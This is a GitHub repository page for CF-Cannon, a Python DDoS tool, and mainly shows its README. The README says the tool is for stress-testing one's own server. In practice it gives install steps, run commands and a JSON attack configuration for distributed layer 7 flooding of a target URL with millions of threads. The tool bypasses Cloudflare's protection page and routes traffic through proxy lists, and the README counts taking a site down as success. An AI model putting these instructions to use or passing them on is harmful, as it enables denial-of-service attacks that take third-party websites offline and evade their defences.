Skip to content
A python based DOS/DDOS test tool
Python Shell
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
.gitattributes Initial commit Oct 8, 2018
.gitignore update import Oct 10, 2018
Bypass.py V2 UPDATE May 5, 2019
BypassCF.py Update BypassCF.py May 13, 2019
LICENSE Initial commit Oct 8, 2018
README.md
attack.py Update attack.py May 13, 2019
install.sh V2 UPDATE May 5, 2019

README.md

LICENSE

CF-Cannon

CF-Cannon is a tool written in python to perform layer 7 stress test on your own server.

---------------------------------------------

https://levyhsu.com/2019/05/cf-cannon-v2/

---------------------------------------------

V2 Version

V2 version enables distributed attack on each nodes with penetration of UAM page by Cloudflare and can be (theoretically) deployed on infinite machines.

Install:

apt-get update
apt-get -y upgrade
apt-get install build-essential nodejs python-setuptools
apt-get install -y python-pip
pip install demjson Flask pycurl 

Run (on each node):

python attack.py

Then use any third party API Tester: (i.e https://apitester.com/)

Post a json request to path written in attack.py (Default: /attack)

attackinfo={
	"T": 8,
	"charset": "utf-8",
	"is_protected_by_cf": false,
	"keywords": "welcome",
	"path": "/index.php",
	"peerCount": 300,
	"threadCount": 10000000,
	"url": "http://www.sample.com"
}

Note: Set "is_protected_by_cf" to be true only if you see following page:

alt text

After sending POST request, you’re suppose to see this: alt text

Failed means your node have no access to target (keyword not found). It can be caused by:

  • You have already take it down (Success)
  • Wrong keyword on html page
  • Your IP/Machine is on blacklist
  • Any other reason that may cause your node have no access to this page

Success simply suggest target web page still functions normally

Disclaimer: Please make sure all your tests are legal and with consent of relevant parties as I won't be responsible for any consequence caused by this script.

---------------------------------------------

V1 Version(NO LONGER UPDATED)

For CF-bypass you'll need a proxy list with very good connection and low latency to your server.

Third party proxy checker you may need: https://github.com/maxmalysh/python-proxy-checker

Install:

apt-get update
apt-get -y upgrade
apt-get install build-essential nodejs python-setuptools python3-setuptools
apt-get install -y python3-pip
pip3 install PySocks requests cfscrape scapy-python3

Run:

python3 cf_cannon.py www.sample-target.com -t 1000 -d /index.php

Parameters:

-d --dir : path of target, I.e: www.abc.com/index.php then -d /index.php
-s --ssl : Use http or https. For https&proxy mode your proxy must support https.
-p --port: Port of the server,80 or 443?
-t --threads: How many threads?
-l --time: Haven't done yet
-x --proxy_file_location : Deafult: proxy.list, feel free to assign other list.

Don't forget:

ulimit -n 655350

Proof of Power

image

Notice that:

Each "ERROR:root:’http://abc.com’ returned an error. Could not collect tokens." indicates one proxy failure (cfscrape can’t access page though server)

The effiecy through proxy is still low, if you have ieda or update, welcome to merge.

You can’t perform that action at this time.